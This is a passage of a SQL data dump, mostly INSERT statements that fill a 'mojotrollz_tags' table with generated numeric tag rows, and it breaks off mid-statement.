INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8822, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8823, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8824, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8825, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8826, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8827, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8828, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8830, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8831, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8832, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8833, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8834, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8835, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8836, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8837, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8838, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8839, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8840, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8841, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8842, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8843, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8844, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8845, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8860, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8861, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8862, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8863, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8864, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8865, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8866, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8867, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8868, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8869, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8870, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8871, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8872, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8873, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8874, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8875, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8876, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8877, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8878, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8879, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8880, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8881, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8882, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8883, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8897, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8898, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8899, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8900, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8901, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8902, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8903, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8904, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8905, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8906, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8907, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8908, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8909, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8910, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8911, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8912, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8913, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8914, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8915, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8916, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8917, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8918, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8919, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8920, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8921, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8922, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8923, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8924, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8925, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8926, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8927, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8928, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8929, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8930, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8931, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8932, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8933, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8934, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8935, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8936, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8937, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8938, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8939, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8940, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8941, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8942, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8943, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8944, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8945, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8947, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8948, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8949, 4, 1, 429, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8949, 4, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8950, 4, 1, 429, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8950, 4, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8951, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8952, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8953, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8954, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8955, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8956, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8957, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8958, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8959, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8960, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8961, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8962, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8963, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8964, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8965, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8966, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8967, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8968, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8969, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8970, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8977, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8978, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8979, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8980, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8982, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8983, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8984, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8985, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8986, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8987, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8988, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8989, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8990, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8991, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8992, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8994, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8995, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8997, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8998, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (8999, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9000, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9001, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9002, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9003, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9004, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9005, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9006, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9007, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9008, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9009, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9010, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9011, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9012, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9013, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9014, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9015, 4, 1, 429, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9015, 4, 2, 2557, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9016, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9017, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9018, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9019, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9020, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9021, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9022, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9023, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9024, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9025, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9026, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9027, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9028, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9032, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9033, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9034, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9036, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9037, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9038, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9039, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9040, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9041, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9042, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9043, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9044, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9045, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9046, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9047, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9048, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9049, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9050, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9051, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9052, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9053, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9054, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9055, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9056, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9057, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9058, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9059, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9060, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9061, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9063, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9068, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9069, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9070, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9071, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9072, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9073, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9074, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9075, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9077, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9078, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9079, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9080, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9081, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9082, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9083, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9084, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9086, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9087, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9088, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9089, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9090, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9091, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9092, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9093, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9095, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9096, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9097, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9098, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9099, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9100, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9101, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9102, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9103, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9104, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9105, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (9106, 4, 1, 0, ' generated'); INSERT INTO 